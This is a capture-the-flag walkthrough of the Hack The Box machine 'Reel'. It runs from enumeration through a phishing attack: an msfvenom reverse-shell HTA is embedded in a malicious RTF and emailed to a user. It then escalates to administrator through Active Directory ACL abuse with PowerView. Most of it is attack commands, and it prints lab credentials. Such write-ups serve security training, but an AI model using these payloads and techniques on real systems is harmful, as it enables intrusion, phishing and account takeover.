Reel

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.77 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Anonymous login is enabled in the FTP server.

ftp 10.10.10.77

Inside the FTP server there is one directory called documents with some files.

ftp> ls documents

Let's transfer all of them to our current machine.

ftp> get AppLocker.docx

ftp> get readme.txt

ftp> get Windows\ Event\ Forwarding.docx

The readme.txt file says that someone is checking for any .rtf files in his email.

cat readme.txt

The AppLocker.txt has some instructions for AppLocker procedure.

docx2txt AppLocker.docx; cat AppLocker.txt

The Windows Event Forwarding.docx seems to be corrupted, so we can not see it's content.

docx2txt Windows\ Event\ Forwarding.docx

But, we can see an email in the metadata.

exiftool Windows\ Event\ Forwarding.docx

As por 25 (SMTP) is open, we can check with the smtp-user-enum toot, if the email nico@megabank.com is valid.

smtp-user-enum -m RCPT -u nico@megabank.com 10.10.10.77 25

  • -m mode to enumerate SMTP users.

  • -u username to test.

Exploitation

As The email is valid, the idea is to generate a malicious .rtf file, and then send it to the nico@megabank.com email address. There is one python script which allow us to create malicious .rtf files. First, we'll have to generate a malicious .hta file with msfvenom, which will send us a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f hta-psh -o malicious.hta

  • -p indicates the type of payload.

  • LHOST local host IP.

  • LPORT local port of the listener.

  • -f output format.

  • -o save the output to a file.

On the current directory, we'll have to set a simple HTTP server, so the victim machine can download the malicious.hta file.

python -m http.server 80

Now, set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, we can execute the script with Python2, and generate the malicious.rtf file.

python2 41894.py -M gen -w malicious.rtf -u http://10.10.14.11/malicious.hta

  • -M generate malicious file only.

  • -w name of the malicious RTF file.

  • -u path to the HTA file.

Finally, if send the malicious file to nico@megabank.com.we should be able to get a shell as nico, and we'll be able to grab the user flag.

sendemail -f alfa8sa@megabank.com -t nico@megabank.com -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf

  • -f sender email address.

  • -t receiver email address.

  • -s SMTP server.

  • -m message to send.

  • -a file attachment.

Privilege Escalation

In the desktop of the user nico, there is a file called cred.xml with some encoded password for the tom user.

type \users\nico\desktop\cred.xml

We'll have to user PowerShell to decode the password.

powershell (Import-CliXml -Path \users\nico\desktop\cred.xml).GetNetworkCredential().password

Now we can log in as tom via SSH.

sshpass -p '1ts-mag1c!!!' ssh tom@10.10.10.77

In the desktop of the tom user there is a directory called AD Audit.

dir \Users\tom\Desktop

There are a few things inside AD Audit.

dir "\Users\tom\Desktop\AD Audit"

The note.txt file says that there is no way to gain admin privileges.

type "\Users\tom\Desktop\AD Audit\note.txt"

Inside the BloodHound directory we can see the PowerView.ps1 script.

dir "\Users\tom\Desktop\AD Audit\BloodHound"

And inside the Ingestors directory there are some files and binaries.

dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"

There is one called acls.csv. Let's transfer it to our local machine. Set an SMB server with impacket.

impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the acls.csv file to the smbFolder share.

copy acls.csv \\10.10.14.11\smbFolder\

We can see that the file has a lot of information about objects, principals, rights and access control type.

csvtool readable acls.csv

If we grep for tom, we'll see that it has WriteOwner rights on the claire user.

csvtool readable acls.csv | grep tom

This means that tom can change the password of the claire user. We'll need to use PowerView.ps1 to do it. First, open a PowerShell shell.

powershell

Then, import the PowerView.ps1 module located in the BloodHound directory.

Import-Module .\PowerView.ps1

Set tom as the owner of claire ACL.

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

Give the right permissions to change claire passsword.

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

Create a credential $cred with the password alfa8sa123$!.

$cred = ConvertTo-SecureString "alfa8sa123$!" -AsPlainText -force

Finally, change claire password to the credential we just made.

Set-DomainUserPassword -identity claire -accountpassword $cred

Now, we can log in as claire via SSH.

sshpass -p 'alfa8sa123$!' ssh claire@10.10.10.77

If we grep for claire in the acls.csv file, we'll see that she has WriteDacl rights on the Backup_Admins group.

csvtool readable acls.csv | grep claire

Which means that I can add the user claire to the Backup_Admins group.

net group Backup_Admins claire /add

In order to get the right permissions, you might need to log out, and then log in again. Now, the user claire is in the Backup_Admins group.

net group Backup_Admins

We can see that the Backup_Admins group have full rights on the \users\administrator directory.

icacls \Users\Administrator

But, we can't see the flag yet.

type \Users\Administrator\Desktop\root.txt

There is a directory called Backup Scripts in the administrator desktop, which has some files.

dir \Users\Administrator\Desktop

If we search the the word Password in all the files, we'll find the password for the administrator user.

powershell "dir | Select-String 'Password'"

Finally, if we log in via SSH as the administrator user, all we have to do is reap the harvest and take the root flag.

sshpass -p 'Cr4ckMeIfYouC4n!' ssh administrator@10.10.10.77

Last updated

Was this helpful?